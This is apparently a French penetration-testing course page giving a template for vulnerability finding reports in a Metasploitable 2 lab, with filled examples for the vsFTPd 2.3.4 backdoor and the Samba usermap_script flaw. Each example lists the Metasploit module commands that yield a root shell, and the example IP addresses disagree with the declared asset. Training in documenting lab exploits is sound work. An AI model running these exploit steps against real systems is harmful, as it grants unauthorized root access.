Fiche finding — référentiel Metasploitable 2#
1. Rôle de la fiche finding#
La fiche de finding détaille chaque Exploitation, du comment jusqu’à la preuve d’impact.
| Élément | Détail |
|---|---|
| But | Documenter une vulnérabilité prouvée (pas seulement détectée par OpenVAS) |
| Quand | Après chaque exploit réussi (phase exploitation) |
| Public cible | RSSI + équipe technique |
2. Modèle standard (à remplir)#
## [TF-XX] Titre court — Service
**Criticité :** Critique / Haute / Moyenne (CVSS x.x si pertinent)
**Actif :** 192.168.56.102 — nom service / port
**Référence :** CVE-XXXX-XXXX (si applicable)
### Description
2–4 phrases : nature de la faille, contexte MS2, lien avec scan OpenVAS/Nessus.
### Reproduction
1. Contexte (depuis Kali 192.168.56.10, grey box interne)
2. Commande ou module MSF (`use`, `set RHOSTS`, `run`)
3. Post-exploit minimal (`id`, `hostname`)
4. Résultat attendu
### Preuve
[Screenshot : sortie `id` / session MSF — horodaté]
### Impact (TechFlow fictif)
Impact métier : accès shell non autorisé, pivot LAN, données sur serveur test…
### Recommandation
Correctif : patch version, désactiver service, segmentation, durcissement…
Priorité : immédiat / 30j / 90j3. Exemple rempli — vsFTPd 2.3.4 (MS2)#
## [TF-01] Backdoor vsFTPd 2.3.4 — FTP
**Criticité :** Critique (CVSS ~10.0 contexte lab)
**Actif :** 192.168.56.102 — vsftpd / TCP 21
**Référence :** CVE-2011-2523
### Description
Le service FTP vsFTPd 2.3.4 présente une backdoor activée par le login « :) »,
permettant l'exécution de commandes système. Détecté par OpenVAS et confirmé
par exploitation Metasploit sur le segment lab TechFlow.
### Reproduction
1. Depuis Kali (172.16.211.219), vérifier port 21 ouvert (reconnaissance).
2. msfconsole : `use exploit/unix/ftp/vsftpd_234_backdoor`, `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run`.
3. Session obtenue : `id` → uid=0(root).
### Preuve
[Capture : sessions -l + id root]
### Impact
Un attaquant interne au VLAN test obtient un shell root sur le serveur legacy,
permettant lecture de fichiers locaux et pivot vers d'autres actifs du segment.
### Recommandation
Mettre à jour vsFTPd hors version 2.3.4 vulnérable ; désactiver FTP clair ;
remplacer par SFTP. Priorité : immédiat.4. Exemple rempli — Samba usermap_script#
## [TF-02] Injection Samba usermap_script — SMB
**Criticité :** Critique
**Actif :** 192.168.56.102 — Samba / TCP 445
**Référence :** CVE-2007-2447
### Description
Samba mal configuré permet l'exécution de commandes via le mécanisme
username map script. Confirmé après scan Nessus (plugin Samba).
### Reproduction
1. `use exploit/multi/samba/usermap_script`
2. `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run`
3. `id` → root.
### Preuve
[Capture getuid / id]
### Impact (TechFlow fictif)
Compromission complète du serveur fichier de test ; risque de propagation
via comptes de service SMB.
### Recommandation
Patcher Samba ; restreindre SMB au VLAN management ; désactiver scripts
map sur serveurs exposés. Priorité : immédiat.5. Identifiants & nommage#
| Convention | Exemple |
|---|---|
| ID rapport | TF-01 … TF-06 (TechFlow) |
| Titre | Service + type faille court |
| Actif | Toujours IP lab + port/service |
| Lien scan | Mentionner OpenVAS/Nessus dans Description |
6. Chaîne documentaire#
Tableau recon ──┐
Rapport scan ──┼──► Fiche finding (exploit prouvé)
Post-exploit ──┘
│
▼
Rapport (synthèse)7. Travail autonome (avant le rapport)#
- Finaliser 2 fiches réseau (exploits MSF)
- Esquisser 1 fiche web (Mutillidae) — champs vides OK
- Vérifier cohérence IDs avec rapport
8. Suite de la démarche#
Phase actuelle : Fiches finding — vulnérabilités prouvées documentées (repro, preuve, impact, correctif).
[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [✓] Exploitation → [✓] Post-exploit → [●] Findings → [ ] RapportÉtape suivante : Rapport — synthèse exécutive, matrice risque × effort et roadmap 30/90/180 jours.